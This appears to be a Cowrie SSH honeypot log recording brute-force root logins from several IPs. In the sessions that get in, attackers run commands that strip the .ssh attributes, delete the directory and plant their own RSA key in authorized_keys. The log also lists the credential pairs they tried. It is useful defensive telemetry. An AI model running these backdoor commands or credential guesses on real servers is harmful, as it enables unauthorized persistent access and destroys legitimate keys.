mac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:00.335445Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.login.success","username":"root","password":"aaaa8888","message":"login attempt [root/aaaa8888] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:00.814400Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:01.081963Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.082756Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.084283Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.195082Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:01.485014Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.485903Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.597819Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.599043Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":48876,"dst_ip":"1.2.3.4","dst_port":22,"session":"318b3fdd08cb","protocol":"ssh","message":"New connection: 192.210.135.20:48876 (1.2.3.4:22) [session: 318b3fdd08cb]","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.706316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.707239Z","src_ip":"192.210.135.20","session":"318b3fdd08cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:01.816738Z","src_ip":"192.210.135.20","session":"318b3fdd08cb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:02.296337Z","src_ip":"192.210.135.20","session":"318b3fdd08cb"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:03.408274Z","src_ip":"192.210.135.20","session":"318b3fdd08cb"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":49540,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f7854aa227d","protocol":"ssh","message":"New connection: 192.210.135.20:49540 (1.2.3.4:22) [session: 3f7854aa227d]","sensor":"my-vps","timestamp":"2025-09-09T04:05:03.517100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:03.518094Z","src_ip":"192.210.135.20","session":"3f7854aa227d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:03.627866Z","src_ip":"192.210.135.20","session":"3f7854aa227d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:04.108484Z","src_ip":"192.210.135.20","session":"3f7854aa227d"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:04.219985Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:04.221172Z","src_ip":"192.210.135.20","session":"3f7854aa227d"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":57832,"dst_ip":"1.2.3.4","dst_port":22,"session":"470622679d60","protocol":"ssh","message":"New connection: 211.22.25.164:57832 (1.2.3.4:22) [session: 470622679d60]","sensor":"my-vps","timestamp":"2025-09-09T04:05:17.716280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:17.717270Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:17.957592Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.login.success","username":"root","password":"qq@123456","message":"login attempt [root/qq@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:18.958151Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:19.460406Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:19.461139Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:19.462426Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:19.703585Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:20.285756Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:05:20.286435Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:05:20.528850Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:20.529824Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":43792,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd81cc24de85","protocol":"ssh","message":"New connection: 211.22.25.164:43792 (1.2.3.4:22) [session: fd81cc24de85]","sensor":"my-vps","timestamp":"2025-09-09T04:05:20.767332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:20.768397Z","src_ip":"211.22.25.164","session":"fd81cc24de85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:21.008777Z","src_ip":"211.22.25.164","session":"fd81cc24de85"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":44504,"dst_ip":"1.2.3.4","dst_port":22,"session":"db334042c4cb","protocol":"ssh","message":"New connection: 51.81.118.153:44504 (1.2.3.4:22) [session: db334042c4cb]","sensor":"my-vps","timestamp":"2025-09-09T04:05:21.073079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:21.073965Z","src_ip":"51.81.118.153","session":"db334042c4cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:21.169646Z","src_ip":"51.81.118.153","session":"db334042c4cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:21.595798Z","src_ip":"51.81.118.153","session":"db334042c4cb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:22.010398Z","src_ip":"211.22.25.164","session":"fd81cc24de85"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:22.693342Z","src_ip":"51.81.118.153","session":"db334042c4cb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:23.252022Z","src_ip":"211.22.25.164","session":"fd81cc24de85"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":43794,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe583686f770","protocol":"ssh","message":"New connection: 211.22.25.164:43794 (1.2.3.4:22) [session: fe583686f770]","sensor":"my-vps","timestamp":"2025-09-09T04:05:23.490980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:23.491891Z","src_ip":"211.22.25.164","session":"fe583686f770"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:23.731689Z","src_ip":"211.22.25.164","session":"fe583686f770"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:24.733275Z","src_ip":"211.22.25.164","session":"fe583686f770"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:24.973716Z","src_ip":"211.22.25.164","session":"470622679d60"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:24.974865Z","src_ip":"211.22.25.164","session":"fe583686f770"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":41132,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2c910de47f8","protocol":"ssh","message":"New connection: 152.32.190.168:41132 (1.2.3.4:22) [session: d2c910de47f8]","sensor":"my-vps","timestamp":"2025-09-09T04:05:24.998240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:24.999079Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:25.194286Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.login.success","username":"root","password":"Q!w2e3r4","message":"login attempt [root/Q!w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:26.014520Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:26.469356Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:26.470071Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
